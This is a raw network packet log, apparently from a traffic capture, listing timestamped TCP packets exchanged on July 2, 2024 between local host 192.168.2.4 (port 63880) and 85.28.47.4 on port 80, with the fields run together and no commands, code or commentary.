                                            Jul 2, 2024 08:26:29.110728979 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.110740900 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.110752106 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.110754967 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.110769033 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.110814095 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.111008883 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.111020088 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.111032009 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.111046076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.111048937 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.111069918 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.111090899 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.111295938 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.111314058 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.111330986 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.111335993 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.111342907 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.111351013 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.111355066 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.111366034 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.111366987 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.111376047 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.111386061 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.111387968 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.111401081 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.111412048 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.111419916 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.111423969 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.111435890 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.111437082 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.111447096 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.111471891 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.111867905 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.111880064 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.111922026 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.112030983 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.112042904 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.112054110 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.112063885 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.112076998 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.112080097 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.112096071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.112101078 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.112108946 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.112114906 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.112122059 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.112133026 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.112143040 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.112144947 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.112157106 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.112164974 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.112174034 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.112184048 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.112185955 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.112198114 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.112207890 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.112210035 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.112231970 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.112250090 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.112967014 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.112978935 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.112989902 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.112999916 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113015890 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113023043 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.113027096 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113038063 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113046885 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.113049984 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113060951 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113066912 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.113071918 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113081932 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.113082886 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113095045 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113105059 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.113106012 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113116980 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113127947 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113132000 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.113138914 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113149881 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113151073 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.113168955 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.113187075 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.113743067 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113756895 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113766909 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113779068 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113795996 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.113825083 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.113903999 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113915920 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113926888 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113938093 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113945961 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.113949060 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113960981 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113969088 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.113972902 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113984108 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113993883 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.113995075 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.114006042 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.114010096 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.114017010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.114029884 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.114032030 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.114041090 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.114049911 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.114052057 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.114063978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.114065886 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.114092112 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.114114046 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.114841938 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.114854097 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.114866018 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.114882946 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.114893913 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.114897013 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.114906073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.114913940 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.114917040 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.114928007 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.114933968 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.114939928 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.114952087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.114963055 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.114969015 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.114973068 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.114978075 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.114984035 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.114995956 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.115008116 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.115015984 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.115017891 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.115020990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.115025043 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.115032911 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.115052938 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.115075111 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.115602970 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.115613937 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.115624905 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.115637064 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.115648031 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.115655899 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.115662098 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.115664959 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.115674973 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.115695000 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.115720034 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.199634075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.199654102 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.199666023 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.199711084 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.199722052 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.199734926 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.199747086 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.199747086 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.199780941 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.199847937 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.199860096 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.199886084 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.199898958 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.199904919 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.199911118 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.199924946 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.199934006 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.199935913 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.199951887 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.199979067 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.199992895 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.200144053 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.200164080 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.200186968 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.200205088 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.200268030 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.200278997 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.200289965 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.200310946 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.200321913 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.200391054 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.200429916 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.200508118 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.200520039 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.200530052 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.200542927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.200552940 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.200556040 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.200567007 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.200575113 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.200583935 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.200603962 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.200644016 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.200819969 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.200833082 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.200843096 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.200854063 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.200854063 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.200866938 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.200887918 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.200949907 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.200961113 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.200970888 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.200977087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.200985909 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.200989008 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.200998068 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.201000929 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.201011896 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.201020956 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.201024055 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.201033115 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.201035023 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.201050043 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.201055050 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.201061964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.201078892 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.201092958 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.201744080 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.201762915 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.201776028 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.201786995 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.201792002 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.201798916 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.201805115 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.201811075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.201814890 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.201823950 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.201848984 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.201864004 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.202042103 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.202054977 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.202065945 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.202078104 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.202089071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.202089071 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.202100039 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.202101946 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.202125072 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.202164888 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.202192068 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.202203989 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.202214956 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.202233076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.202234030 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.202244043 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.202255011 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.202256918 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.202267885 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.202274084 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.202280998 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.202285051 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.202299118 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.202308893 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.202317953 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.202317953 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.202347040 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.203121901 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.203135014 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.203145981 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.203155994 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.203166962 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.203171968 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.203181982 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.203188896 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.203202009 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.203212976 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.203212976 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.203224897 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.203237057 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.203237057 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.203248024 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.203258991 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.203258991 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.203267097 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.203272104 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.203283072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.203288078 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.203293085 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.203299999 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.203313112 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.203321934 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.203327894 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.203347921 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.204046965 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.204060078 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.204071045 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.204082966 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.204093933 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.204097986 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.204108953 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.204119921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.204124928 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.204132080 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.204142094 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.204145908 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.204154015 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.204165936 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.204173088 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.204176903 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.204188108 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.204191923 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.204200029 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.204210043 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.204212904 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.204225063 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.204227924 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.204236031 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.204246998 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.204247952 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.204272032 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.204289913 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.204921961 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.204933882 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.204945087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.204956055 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.204962015 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.204968929 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.204979897 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.204982042 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.204991102 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.205002069 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.205008984 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.205013990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.205017090 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.205043077 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.205064058 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.288820028 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.288841009 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.288852930 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.288865089 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.288877010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.288891077 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.288968086 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.289021015 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.289539099 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.289593935 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.289598942 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.289612055 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.289643049 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.289654016 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.289731026 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.289745092 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.289757013 CEST806388085.28.47.4192.168.2.4
